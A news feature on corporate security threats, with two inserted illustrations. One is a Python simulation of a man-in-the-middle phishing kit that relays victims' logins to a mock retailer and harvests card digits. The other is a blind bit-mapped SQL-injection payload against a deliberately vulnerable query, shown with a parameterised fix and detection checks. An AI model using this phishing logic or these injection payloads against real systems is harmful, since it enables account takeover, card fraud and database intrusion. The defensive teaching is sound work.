Get smart to counter hacker attacks

Sophisticated threats to corporate security can be difficult to combat

Hackers are getting more clever and more greedy. Staff are being bribed to disclose customer information, and the internet is made up of a growing army of hijacked PCs that spew out an endless flood of spam, phishing scams and malware on to an ill-defended world. It is not a pretty picture.

Reading through the security companies' latest reports is enough to make you turn off the computers, shut down the networks and go back to quill pens. Well, almost.

The security companies want you to buy their products, of course, and therefore have an interest in painting the worst of pictures, but there is enough evidence to show that the situation is getting worse.

Take spam, for instance. According to security company SoftScan, 90.3% of e-mail was spam during February, and on one Sunday the level reached 96.22%. And security company Postini said spam reached 94% last December, up by 114% on the previous December.

Apart from all that wasted bandwidth, you have the problem of filtering out the good from the bad and the ugly. That takes money and processing power, and in order to keep out most of the dross, you inevitably end up quarantining valid messages. In the process, the e-mail system that has served you well for the past couple of decades starts to be more troublesome to manage and use.

The inconvenience is the least of the problems, though. Spam increasingly comes with a vicious payload, designed to take control of the target computer, and also to steal information from it.

For example, last December the Happy New Year worm drove the daily volume of e-mail-borne viruses on the internet up by a factor of 20 on New Year's weekend. Also known as Nuwar and Mixor, the worm used social engineering techniques designed to exploit people's expectations of legitimate New Year's postcards and greetings from friends and family.

Serious professionals might not fall for that scam, but what about opening an innocent-looking Word document? According to Ollie Whitehouse, a threat researcher at Symantec, hackers have been forced to become more cunning as users get smarter.

He said Symantec detected five zero-day exploits released against Microsoft Office in the period from July to December 2006. In this attack method, hackers lure users into opening a word processing document, presentation or spreadsheet that has been crafted to trigger an unpatched vulnerability in the application.

This triggers malicious code, which downloads a back door or Trojan dropper on to the machine; that in turn calls out to fetch a more feature-rich piece of malicious code.

"It appears to be an effective way for these malicious individuals to compromise the machines of people who would regard themselves as security-aware. The hacker then uses it to gain access to personal information, and the machine can be used in a botnet," said Whitehouse.

Phishing attacks also show no sign of going away. Having started by targeting the banks, phishers now go for any company with a web presence that holds customer information.

Paypal, Amazon and eBay have become obvious targets, and Virgin Media was a recent victim, with a spoofed e-mail asking customers to re-confirm their account details.

But phishers too are getting more cunning, according to Mikko Hyppönen, chief technologist at security company F-Secure. He is especially concerned about the rise of man-in-the-middle attacks.

"We saw the first real man-in-the-middle attacks about 11 months ago, one targeting Paypal, the other targeting a big US bank," he says.

"Last week we found five separate kits for man-in-the-middle attacks, targeting sites such as Amazon."

He describes one recent attack aimed at a well-known online retailer: "You get an e-mail asking you to clarify something about your account. You follow a link and end up on a page that looks just like the retailer's site. It asks you for your user name and password, which it sends off to the bad boys just as in traditional scams.

"But it also uses the user name and password to log into the real site. It goes to your profile page and it downloads all the information about you. It then creates a new page, which asks the user to 'confirm' their details."

Here is the clever bit. Having "legitimate" access to the user's account, it can present a whole page of valid information to reassure the user, even a list of their payment details with just the last four digits of the credit card showing.

In a devious trick of reverse psychology, it then asks the user to prove who they are by filling in the blanked-out digits of the credit card number.
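The flow Hyppönen describes, as an added illustration that is not part of the original article and not code from any real kit. A mock retailer stands in for the genuine site and a proxy class for the kit; all account names, addresses, card numbers and the kit's IP address (198.51.100.7, from the documentation range) are constructed. The last function is the retailer-side check a practitioner would want: because the kit relays every victim's credentials to the real site from its own address, the real site's login log shows one address logging into many different accounts.

```python
# Added illustration of the man-in-the-middle phishing flow. MockRetailer
# stands in for the genuine site, PhishingProxy for the kit. Every name,
# account and address here is constructed.
from collections import defaultdict

# Constructed victim accounts held by the (mock) retailer
REAL_SITE_ACCOUNTS = {
    "alice": {"password": "correct horse", "name": "Alice Example",
              "address": "1 High Street", "card": "4111111111111111"},
    "bob":   {"password": "hunter2",       "name": "Bob Example",
              "address": "2 High Street", "card": "5555555555554444"},
    "carol": {"password": "s3cret",        "name": "Carol Example",
              "address": "3 High Street", "card": "4012888888881881"},
}

class MockRetailer:
    """The genuine site. A logged-in customer sees their profile and a masked
    card number; the full card number is never displayed."""
    def __init__(self, accounts):
        self.accounts = accounts
        self.login_log = []                      # (username, client_ip)

    def login(self, username, password, client_ip):
        acct = self.accounts.get(username)
        if acct is None or acct["password"] != password:
            return None
        self.login_log.append((username, client_ip))
        return {"user": username}                # session stand-in

    def profile(self, session):
        acct = self.accounts[session["user"]]
        return {"name": acct["name"], "address": acct["address"],
                "card_masked": "**** **** **** " + acct["card"][-4:]}

class PhishingProxy:
    """The kit. It records what the victim types, relays it to the real site
    to log in, copies the real profile, and builds a 'confirm' page from it."""
    def __init__(self, real_site, kit_ip):
        self.real_site = real_site
        self.kit_ip = kit_ip                     # the address the real site sees
        self.harvested = {}                      # username -> stolen record

    def handle_login(self, username, password):
        # 1. relay the credentials; the real site sees the kit's IP, not the victim's
        session = self.real_site.login(username, password, self.kit_ip)
        if session is None:
            return {"page": "error", "message": "Invalid login, please try again"}
        # 2. pull everything the victim's own account page shows
        prof = self.real_site.profile(session)
        self.harvested[username] = {"password": password, "profile": prof}
        # 3. reassure with genuine data, then ask for what the mask hides
        return {"page": "confirm",
                "greeting": "Welcome back, " + prof["name"],
                "address": prof["address"],
                "card_on_file": prof["card_masked"],
                "prompt": "To verify it is you, enter the hidden digits of this card"}

    def handle_confirm(self, username, hidden_digits):
        rec = self.harvested.get(username)
        if rec is None:
            return None
        rec["card_full"] = hidden_digits + rec["profile"]["card_masked"][-4:]
        return rec["card_full"]

def shared_login_sources(site, min_accounts=3):
    """Retailer-side check: the relay leaves a trace, because every victim's
    login reaches the real site from the kit's address. Return addresses that
    logged into at least min_accounts distinct accounts."""
    by_ip = defaultdict(set)
    for user, ip in site.login_log:
        by_ip[ip].add(user)
    return {ip: sorted(users) for ip, users in by_ip.items()
            if len(users) >= min_accounts}

def run_demo():
    site = MockRetailer(REAL_SITE_ACCOUNTS)
    kit = PhishingProxy(site, "198.51.100.7")    # constructed kit address
    for user, acct in REAL_SITE_ACCOUNTS.items():
        kit.handle_login(user, acct["password"])
    kit.handle_confirm("alice", "411111111111")
    return kit.harvested, shared_login_sources(site)

if __name__ == "__main__":
    harvested, suspects = run_demo()
    print(harvested["alice"]["card_full"], suspects)
```

Note that the "confirm" page never contains anything the kit could not have obtained by logging in as the victim, which is exactly why it looks authentic; the full card number only exists once the victim supplies the hidden digits. The one thing the kit cannot hide is the source address of its relayed logins, which is what the last check keys on.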

Worst of all, Hyppönen says, the attacks are now becoming available as toolkits on the internet, so everyone can have a try. And researchers from security company RSA have recently discovered a new universal man-in-the-middle phishing kit, which allows the would-be fraudster to create a fraudulent URL via a simple and user-friendly online interface.

This means that just about any company with an e-commerce presence could become a target of phishing scams.

Apart from constantly reminding their customers of the dangers of such attacks, e-commerce companies have few options beyond subscribing to a monitoring and takedown service. An example is RSA's FraudAction anti-phishing and anti-pharming service, which operates a broad monitoring and detection network to get rogue sites blocked quickly.

Of course, it is not just the blunderbuss effect of spam and phishing that companies need to worry about. Most security researchers report that hackers are still using crafted attacks to get into companies to steal information, sometimes sponsored by rivals looking for competitive information, or even by foreign governments in some cases.

Hyppönen says his company investigated a handful of such cases last year, but admits they could be the tip of an otherwise undiscovered iceberg.

One example comes from Secerno, which specialises in database protection. Chief executive Paul Davie says one of his clients, an online travel company, was recently visited by a hacker looking for crucial information.

"We put systems in before Christmas and reviewed the progress in January, going through a couple of days' traffic. Out of hundreds of thousands of instructions, there was just one that contained some code that sought to find out, using simple bit-mapping within SQL injection, which standard management accounts the company had set up as system administrator accounts," says Davie.

"It was beautifully crafted. It was effectively a scouting instruction, designed to find out where the vulnerabilities lay in the system. We passed it round to some penetration testers in the industry. They had not seen this code before, so there was no way there was a signature looking for it.

"They could find out which of 16 possible administrator accounts were being used. The owner of the system nearly fell off his chair when we explained what it could have done."

The Secerno system had blocked the attack because it checks for anomalous behaviour; a signature-based defence would not have picked it up.
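An added illustration of the technique Davie describes, not the query seen on the travel company's system and not Secerno's code: a blind SQL-injection probe that bit-maps which of 16 candidate administrator names are set up as administrators, beside the parameterised query that stops it, and a simple shape-based anomaly check of the kind the passage contrasts with signatures. It goes beyond the text in showing both the defence and the detection. The schema, the 16 account names and the sample rows are constructed, and SQLite stands in for the real database.

```python
# Added illustration: blind bit-mapped SQL-injection probe, parameterised
# fix, and a shape-based anomaly check. All names and data are constructed.
import re
import sqlite3

# 16 hypothetical account names a scout might test for, one per bit
CANDIDATE_ADMINS = ["sa", "admin", "administrator", "root", "sysadmin", "dba",
                    "operator", "manager", "support", "backup", "webadmin",
                    "dbadmin", "sysop", "superuser", "service", "guest"]

def build_db():
    """Constructed sample database: a public products table and a users table
    in which three of the candidate names are set up as administrators."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (code TEXT, name TEXT);
        INSERT INTO products VALUES ('LON-NYC', 'London to New York'),
                                    ('LON-PAR', 'London to Paris');
        CREATE TABLE users (username TEXT, is_admin INTEGER);
        INSERT INTO users VALUES ('alice', 0), ('sa', 1), ('dba', 1),
                                 ('bob', 0), ('backup', 1);
    """)
    return conn

def build_sql(code):
    # Deliberately vulnerable: the user-supplied code is concatenated into SQL.
    return "SELECT name FROM products WHERE code = '" + code + "'"

def vulnerable_lookup(conn, code):
    """All the caller learns is whether a product matched (a blind oracle)."""
    return bool(conn.execute(build_sql(code)).fetchall())

def safe_lookup(conn, code):
    """Parameterised form: the input can only ever be a product code."""
    rows = conn.execute("SELECT name FROM products WHERE code = ?", (code,)).fetchall()
    return bool(rows)

def bitmap_subquery():
    """One SELECT that folds all 16 existence tests into a single integer:
    bit i is set when CANDIDATE_ADMINS[i] is an administrator."""
    terms = " + ".join(
        "(CASE WHEN EXISTS (SELECT 1 FROM users WHERE username = '%s' AND is_admin = 1)"
        " THEN %d ELSE 0 END)" % (name, 1 << i)
        for i, name in enumerate(CANDIDATE_ADMINS))
    return "(SELECT " + terms + ")"

def admin_bitmask(conn):
    """The scouting instruction run directly, as a database user could run it."""
    return conn.execute("SELECT " + bitmap_subquery()).fetchone()[0]

def probe_admins(lookup, conn):
    """Blind recovery of the bitmask through the found/not-found oracle:
    one request per bit, each asking 'is bit i of the mask set?'."""
    mask = 0
    for i in range(len(CANDIDATE_ADMINS)):
        payload = "x' OR (%s & %d) != 0 --" % (bitmap_subquery(), 1 << i)
        if lookup(conn, payload):
            mask |= 1 << i
    return [name for i, name in enumerate(CANDIDATE_ADMINS) if mask >> i & 1]

def statement_shape(sql):
    """Strip literals so only the structure of a statement remains."""
    s = re.sub(r"'[^']*'", "'?'", sql)
    s = re.sub(r"\b\d+\b", "?", s)
    return re.sub(r"\s+", " ", s).strip().lower()

class ShapeBaseline:
    """Anomaly check: learn the shapes of the statements the application
    normally issues, then flag any statement whose shape is unseen. No
    signature for the probe is needed; it is flagged because it does not
    look like anything the application generates."""
    def __init__(self):
        self.seen = set()

    def learn(self, sql):
        self.seen.add(statement_shape(sql))

    def is_anomalous(self, sql):
        return statement_shape(sql) not in self.seen

if __name__ == "__main__":
    db = build_db()
    print(admin_bitmask(db), probe_admins(vulnerable_lookup, db),
          probe_admins(safe_lookup, db))
```

The probe never needs an error message or any data in the response: the 16 yes/no answers are enough to rebuild the mask. Against the parameterised lookup the same payloads are just unmatched product codes, and the shape baseline flags the injected statement because its structure (a subquery into the users table, bitwise operators, a trailing comment) appears nowhere in the learned traffic.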

However, external attacks still only account for about 20% of the dangers facing system owners. The rest come from insiders who already hold legitimate credentials and passwords.

Offshore call centres in India received bad publicity last year when it was discovered that personal data was being sold by workers. But the situation is no better in places like Glasgow, where local police estimate one in 10 call centres has been infiltrated by criminal gangs, or in Newcastle, where call centre staff are regularly accosted by crooks with wads of cash trying to buy personal information.

A company's own staff may pose equal danger, if only by accident. For instance, the Nationwide employee who had his laptop stolen last year from his home could hardly have foreseen the £980,000 fine his employer would have to pay, on account of the personal information that was stored on the machine.

In that particular case, encrypting the files would have adequately secured the data, a solution that Nationwide has since adopted.

New research from content security company Clearswift flags further potential problems from younger staff who have grown up with the internet and who have moved seamlessly into Web 2.0.

A YouGov survey of 1,000 companies found that workers between the ages of 18 and 29 regarded regular visits to YouTube, MySpace and blogs as a natural part of their working day. Twenty-seven per cent admitted spending three or more hours on such sites at work, and 42% admitted to discussing work-related issues on the sites.

Companies need to maintain a fine balance between harnessing new technologies for business benefits and maintaining security, says Ian Bowles, chief operating officer at Clearswift. Most workers now expect some level of personal e-mail and internet access as a right, and a blanket ban would be unacceptable in most organisations.

So what does a company do to prevent this onslaught on its security, both from the outside and within? The answer is to go back to basics.

The general consensus among security experts is to assess risks and manage them through a combination of people, process and technology.

Apply defence in depth, from the basic anti-virus and anti-spam functions (which could come as a service) to the more sophisticated content filtering and behavioural monitoring that keep staff activity in check. And patch vulnerabilities quickly where they expose a risk.

It is also important to encrypt sensitive data, so that a stolen laptop or Blackberry will not be a disaster. But also make sure you manage the encryption keys, so that the data remains accessible when you need it.

And finally make sure you train staff to be security-aware.

"If you have a staff culture where people have been made aware of security and have been told about social engineering exploits, for instance, then they will avoid a lot of the problems," said Mark Jones, a partner in charge of security and risk at Atos Origin.

"It does not need a lot of expense or training, but it can lift security cost-effectively across the whole organisation."
